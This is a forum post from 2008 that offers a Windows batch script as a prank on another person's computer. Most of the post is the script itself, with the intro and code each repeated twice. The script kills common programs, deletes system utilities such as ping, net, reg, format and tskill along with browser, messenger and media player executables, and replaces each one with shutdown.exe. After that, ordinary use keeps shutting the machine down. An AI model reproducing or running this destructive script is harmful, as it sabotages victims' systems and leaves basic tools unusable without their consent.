06-28-2008, 03:19 PM
Allright. This batch will cause the user shutting down their computer on accident alot. After running this batch all of the following things will make the computer shutdown:
starting internet explorer
starting firefox
starting MSN messenger
starting Paint
starting Windows media player
starting Quicktime player
starting iTunes
starting Notepad
-opening text documents
-editing files
-viewing page sources
Using any of the following cmd commands: xcopy, chkdsk, tskill, tracert, ping, net, netsh, netstat, rename, logoff, reg add, format, msg, compact, attrib or ipconfig.
so yes. Alot of common actions will shutdown the computer. Fun eh?
Heres the code:
Enjoy
starting internet explorer
starting firefox
starting MSN messenger
starting Paint
starting Windows media player
starting Quicktime player
starting iTunes
starting Notepad
-opening text documents
-editing files
-viewing page sources
Using any of the following cmd commands: xcopy, chkdsk, tskill, tracert, ping, net, netsh, netstat, rename, logoff, reg add, format, msg, compact, attrib or ipconfig.
so yes. Alot of common actions will shutdown the computer. Fun eh?
Heres the code:
Code here, if ya click me (Click to View)
@echo off
del %windir%\system32\xcopy.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\xcopy.exe"
del %windir%\system32\ipconfig.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\ipconfig.exe"
del %windir%\system32\tracert.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\tracert.exe"
del %windir%\system32\ping.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\ping.exe"
del %windir%\system32\logoff.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\logoff.exe"
del %windir%\system32\rename.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\rename.exe"
del %windir%\system32\compact.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\compact.exe"
del %windir%\system32\chkdsk.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\chkdsk.exe"
del %windir%\system32\msg.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\msg.exe"
del %windir%\system32\attrib.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\attrib.exe"
del %windir%\system32\format.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\format.exe"
del %windir%\system32\netstat.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\netstat.exe"
del %windir%\system32\netsh.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\netsh.exe"
del %windir%\system32\net.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\net.exe"
del %windir%\system32\reg.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\reg.exe"
tskill iexplorer /a
tskill iexplorer /a
tskill iexplorer /a
del %programfiles%\internet explorer\iexplore.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%programfiles%\internet explorer\iexplore.exe"
tskill firefox /a
tskill firefox /a
tskill firefox /a
del %programfiles%\mozilla firefox\firefox.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%programfiles%\mozilla firefox\firefox.exe"
tskill msnmsgr /a
tskill msnmsgr /a
tskill msnmsgr /a
tskill msmsgs /a
tskill msmsgs /a
tskill msmsgs /a
del %programfiles%\messenger\msmsgs.exe /Q /F /S
del "%programfiles%\windows live\messenger\msnmsgr.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%programfiles%\messenger\msmsgs.exe"
copy "%windir%\system32\shutdown.exe" "%programfiles%\windows live\messenger\msnmsgr.exe"
tskill mspaint /a
tskill mspaint /a
tskill mspaint /a
del %windir%\system32\mspaint.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\mspaint.exe"
tskill notepad /a
tskill notepad /a
tskill notepad /a
del %windir%\system32\notepad.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\notepad.exe"
tskill iTunes /a
tskill iTunes /a
tskill iTunes /a
del %programfiles%\iTunes\iTunes.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%programfiles%\iTunes\iTunes.exe"
tskill wmplayer /a
tskill wmplayer /a
tskill wmplayer /a
del "%programfiles%\windows media player\wmplayer.exe" /Q /F /S
copy "%windir%\system32\shutdown.exe" "%programfiles%\windows media player\wmplayer.exe"
tskill quicktime* /a
tskill quicktime* /a
tskill quicktime* /a
del %programfiles%\quicktime\quicktimeplayer.exe
copy "%windir%\system32\shutdown.exe" "%programfiles%\quicktime\quicktimeplayer.exe"
del %windir%\system32\tskill.exe
copy "%windir%\system32\shutdown.exe" "%windir%\system32\tskill.exe"
MSG * careful not to shutdown the computer.
del %windir%\system32\xcopy.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\xcopy.exe"
del %windir%\system32\ipconfig.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\ipconfig.exe"
del %windir%\system32\tracert.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\tracert.exe"
del %windir%\system32\ping.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\ping.exe"
del %windir%\system32\logoff.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\logoff.exe"
del %windir%\system32\rename.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\rename.exe"
del %windir%\system32\compact.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\compact.exe"
del %windir%\system32\chkdsk.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\chkdsk.exe"
del %windir%\system32\msg.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\msg.exe"
del %windir%\system32\attrib.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\attrib.exe"
del %windir%\system32\format.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\format.exe"
del %windir%\system32\netstat.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\netstat.exe"
del %windir%\system32\netsh.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\netsh.exe"
del %windir%\system32\net.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\net.exe"
del %windir%\system32\reg.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\reg.exe"
tskill iexplorer /a
tskill iexplorer /a
tskill iexplorer /a
del %programfiles%\internet explorer\iexplore.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%programfiles%\internet explorer\iexplore.exe"
tskill firefox /a
tskill firefox /a
tskill firefox /a
del %programfiles%\mozilla firefox\firefox.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%programfiles%\mozilla firefox\firefox.exe"
tskill msnmsgr /a
tskill msnmsgr /a
tskill msnmsgr /a
tskill msmsgs /a
tskill msmsgs /a
tskill msmsgs /a
del %programfiles%\messenger\msmsgs.exe /Q /F /S
del "%programfiles%\windows live\messenger\msnmsgr.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%programfiles%\messenger\msmsgs.exe"
copy "%windir%\system32\shutdown.exe" "%programfiles%\windows live\messenger\msnmsgr.exe"
tskill mspaint /a
tskill mspaint /a
tskill mspaint /a
del %windir%\system32\mspaint.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\mspaint.exe"
tskill notepad /a
tskill notepad /a
tskill notepad /a
del %windir%\system32\notepad.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%windir%\system32\notepad.exe"
tskill iTunes /a
tskill iTunes /a
tskill iTunes /a
del %programfiles%\iTunes\iTunes.exe /Q /F /S
copy "%windir%\system32\shutdown.exe" "%programfiles%\iTunes\iTunes.exe"
tskill wmplayer /a
tskill wmplayer /a
tskill wmplayer /a
del "%programfiles%\windows media player\wmplayer.exe" /Q /F /S
copy "%windir%\system32\shutdown.exe" "%programfiles%\windows media player\wmplayer.exe"
tskill quicktime* /a
tskill quicktime* /a
tskill quicktime* /a
del %programfiles%\quicktime\quicktimeplayer.exe
copy "%windir%\system32\shutdown.exe" "%programfiles%\quicktime\quicktimeplayer.exe"
del %windir%\system32\tskill.exe
copy "%windir%\system32\shutdown.exe" "%windir%\system32\tskill.exe"
MSG * careful not to shutdown the computer.